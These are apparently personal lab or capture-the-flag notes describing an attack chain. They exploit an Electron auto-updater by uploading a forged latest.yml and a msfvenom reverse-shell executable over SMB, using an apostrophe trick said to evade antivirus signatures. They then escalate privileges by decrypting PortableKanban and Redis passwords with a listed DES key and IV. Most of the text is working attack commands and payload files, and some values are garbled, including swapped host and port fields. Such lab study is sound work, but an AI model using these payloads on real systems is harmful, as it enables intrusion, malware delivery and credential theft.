• auto update feature

• Download the setup zip file with smb/ftp

• and extract it ---> plugin folder

1.app-64.7z -> 7z x app_64.7z to extract it.

1.app.asar ->sudo npm g install asar

asar l app.asar (lists files)

asar ef app.asar main.js (this command extracts a main.js file from the app)

asar e app.asar $(pwd) - extracts everything?

Google electron updater RCE exploit.

version: 1.2.3
files:
  - url: v’ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

the apostrofe can evade AV sig.

 msfvenom -p windows/x64/shellreversetcp LPORT=ADFKASF LHOST=5555 -f exe -o rev.exe 

modify the exploit

version: 1.2.3
files:
  - url: r’ev.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 7168
path: r'ev.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2021-11-20T11:17:02.627Z'

sha512sum rev.exe | awk '{print $1}' | xxd -r -p | base64 -w 0

paste the sha512

smbclient //IP/Software_Updates

put latest.yml

put rev.exe

and set up a nc listener

///

Priv Esc:

PortableKanban

Portablekanban.config

Read the config and se theDbport & DbEncpassword

go to cyberchef website and decrypt the pass.

• copy the enc pass and select from base64 option

• copy the DES key.

• drag and drop decrypt DES key (

  Copy

  DES 7ly6UznJ 

  Copy

  IV XuVUm5fR

it uses redis

redis-cli -h IP
>> auth pass
>> ping
>> keys * (lists all the keys) 
>> get "key"

decrypt the pass with the same config on the cybershef.